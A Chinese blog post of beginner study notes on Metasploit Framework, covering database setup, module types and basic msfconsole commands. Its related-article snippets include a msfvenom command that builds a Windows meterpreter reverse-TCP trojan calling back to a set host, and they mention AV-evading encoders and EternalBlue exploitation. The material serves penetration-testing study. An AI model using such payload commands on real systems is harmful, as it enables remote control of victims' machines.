MSF(一):MSF基础

最新推荐文章于 2024-11-20 15:07:06 发布
最新推荐文章于 2024-11-20 15:07:06 发布
阅读量4.5k 收藏 80
点赞数 8
分类专栏: Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/104336466
版权

MSF基础

安全牛学习Metasploit Framework笔记

一、前言

  • msfconsole
    作用:打开msf
    PS:当前版本的msf不需要再msfconsole之前再输入service postgresql start,以前的版本可能需要
  • msfdb init
    作用:初始化msfdb
  • msfdb start
    作用:开启msfdb
  • msfdb stop
    作用:暂停msfdb
    疑难解决:如果出现如下所示问题,初始化数据库即可

二、基本内容

- 高级、动态、可扩展的Payload
- 基于meterpreter上下文利用更多漏洞发起攻击
- 后渗透测试阶段一 站式操作界面
- 完全基于内存的DLL注入式payload (不写硬盘)
- 注入合法系统进程并建立stager
- 基于Stager.上传和预加载DLL .进行扩展模块的注入(客户 端API)
- 基于stager建立的socket连接建立加密的TL S/1.0通信隧道
- 利用TLS隧道进步加载后续扩 展模块(避免网络取证)
- 服务端使用C语言编写
- 客户端提供基于ruby的全特性API (支持任何语言)

在kali的/usr/share/metasploit-framework目录下有如图所示内容
在这里插入图片描述
这里我们主要了解modules

1、modules

modules有如下图所示模块
在这里插入图片描述

(1)auxiliary:执行信息搜集、枚举、指纹探测、扫描等功能的辅助模块
(2)encoders:对payload进行加密,躲避AV检查的模块
(3)evasion:逃避检查
(3)exploits:/usr/share/metasploit-framework/modules/exploits目录下全是攻击时的利用代码
(4)nops:提高payload稳定性及维持大小
(5)paylodas:三种payload
    singles:all-in-one,各种功能都有的payload,占用空间比较大
    stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
    stages:利用stager建议的连接,下载后续payload
(6)post:  后渗透模块
2、plugins:插件
3、tools:工具
4、msfvenom:木马制作

三、基本使用

1、msf更新:
apt install metasploit-framework/apt-get install metasploit-framework
2、msfconsole基本使用

  • 启动:msfconsole/msfconsole -q(安静启动,不显示banner)

  • 执行含有msf命令的文件(相当于自动执行一个脚本):msfconsole -r

  • 查看版本:msfconsole -v

  • 当前窗口可以执行的命令:help/?

  • 当前命令如何使用:help workspace/workspace -h

  • 退出msf:exit

  • banner(标语,msf简单的介绍)

  • color:color true(color auto)/color false 默认开启颜色区分

  • connect -h(msf中的nc)

  • show

  • search/search -h
    单条件查询:search name:xxx
    多条件查询:search name:xxx type:auxiliary

  • 进入模块后:info查看模块信息

  • show options/payloads/targets/advanced/evasion

  • edit:修改命令,类似于linux中的vim

  • check:判断目标ip是否存在该漏洞(并不是所有利用模块存在,仅有少部分模块支持check)

  • back:返回,类似于linux中的cd …

  • db_status:查看msf中数据库是否连接

  • db_rebuild_cache:在msf内部创建和外部/usr/share/metasploit-framework/modules一样的缓存,以提高内部搜索速度

  • db_disconnect:断开当前数据库的连接

  • db_connect:连接指定数据库

MSF数据库初始化
L_KevinK的博客
08-27 4677
MSF数据库初始化(1.1)第一次进入 msf 发现数据库并没有连接,因为 msf 数据库需要手工创建(1.2)启动 postgresql 服务(1.3)初始化 msf 数据库(1.4)重新进入 msf ,输入 db_status ,可见数据库已自动连接 (1.1)第一次进入 msf 发现数据库并没有连接,因为 msf 数据库需要手工创建 (1.2)启动 postgresql 服务 servic...
msf 学习笔记(1)
Shadow 爬爬记
10-20 1366
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
MSF初学
h0ld1rs的博客
08-10 360
文章目录技术功能模块exploits(布局)payload(正面战场)auxiliary(侦察兵)encoders(伪装)nops(buff)使用msfconsoleconnectsearchuseshoweditcheck 今天开始学习MSF,查阅了一些资料可以知道,这是一个很强大的渗透工具 大家可以打开kali’,直接在命令行窗口输入msfconsole,然后回车。这样就打开了msfconsoleMsfconsole的系统文件和用户文件位于/usr/share/metasploit-framewor
【网络安全零基础入门】之MSF使用教程永恒之蓝漏洞扫描与利用教程,全文干货建议收藏!
最新发布
白帽阿叁的博客
11-20 823
Metasploit框架(Metasploit Framework, MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口(如控制台、 Web 、 CLI )。推荐使用控制台接口,通过控制台接口,你可以访问和使用所有Metasploit的插件,例如Payload、利用模块、 Post模块等。
MSF(Metasploit Framework)详细介绍及用法【新手篇】
h1008685的博客
04-04 4788
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块 ,会话管理,辅助命令,系统命令MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】
MSF基础
CP1024的博客
10-19 496
MSF基础知识 Metasploit框架是一个开源工具,目的是方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 需要在命令行输入msconsole 知识点: 更新命令: 1. apt-get update:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。 2. apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态。 3. apt-get dist-upgrade:升级整
msf使用基础
qq_46804551的博客
05-03 684
前言 msf是后渗透神奇,在kali中已经内置有。 1.1 基础使用 metasploit程序需要使用postgresql数据库 手动启动数据库: service postgresql start 设置成开机启动数据库: systemctl enable postgresql 启动msf msfconsole 1.2.查找模块 search 模块名 //比如我要找永恒之蓝 search ms17_010 使用那个模块 use 模块名或use 前面的数字都可以 1.3使用模块 #查看要设置的参
msf基础使用
L1928的博客
08-31 310
Msf 1.msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5555 -f exe x>123.exe 生成木马 -a选择架构 -f输出文件格式 -o文件输出 windows/meterpreter/reverse_tcp 攻击载荷 LHOST=192.168.1.109 本机地址 LPORT=5555 端口号 2.msfconsole 启动msf 3.use exploit/multi
msf简单运用基础
12-16
msf简单运用基础篇,一步一步慢慢来。努力加油
内网MSF基础:PostgreSQL配置与权限管理教程
这篇文章为读者提供了一个在内网环境中配置MSF所需的基础数据库管理和用户权限设置的步骤,这对于使用MSF进行渗透测试或安全评估的人来说是至关重要的。后续的配置步骤可能会根据实际需求和环境有所不同,但这些基础...
MSF19:Maumee夏季博览会网站2019
04-15
使用Gatsby CLI创建一个新站点,并指定默认启动器。 # create a new Gatsby site using the default starter gatsby new my-default-starter https://github.com/gatsbyjs/gatsby-starter-default 开始开发。 ...
halogenOS Builds by MSF Jarvis:于云妮(YU Yunique)的卤素OS版本-开源
04-26
卤素OS,又名HalogenOS,是一款基于Android开源项目(AOSP)的第三方定制操作系统,专注于提供流畅、快速且个性化的用户体验。标题中的“MSF Jarvis”可能是开发者或团队的名称,他们为云妮(YU Yunique)这款设备...
内网MSF--从入门到熟练
qq_53003652的博客
12-25 1803
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
【kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一篇就够了
Javachichi的博客
09-27 1495
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
MSF系列——简介及基本命令使用
weixin_49340699的博客
01-11 1988
MSF系列——简介及基本命令使用MSF简介模块常用命令介绍 MSF简介 Metasploi是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasplit团队一
Metasploit(MSF)基础超级详细版
热门推荐
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
永恒之蓝msf下 ms17_010 (64位kali下安装wine32)
12-29 1021
本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 ================================= 若kali为64位 windows为32 需要安装wine32 ,但64位的kali下无法apt-get install ...
kali中MSF更新(完美升级)
LizimU_0911的博客
12-14 6196
1. 首先在root权限下进入命令行模式 2. 找到etc文件夹下的apt文件夹中的sources.list文件 3. 使用vi命令进入编辑模式,添加如图所示的内容:
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2607
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>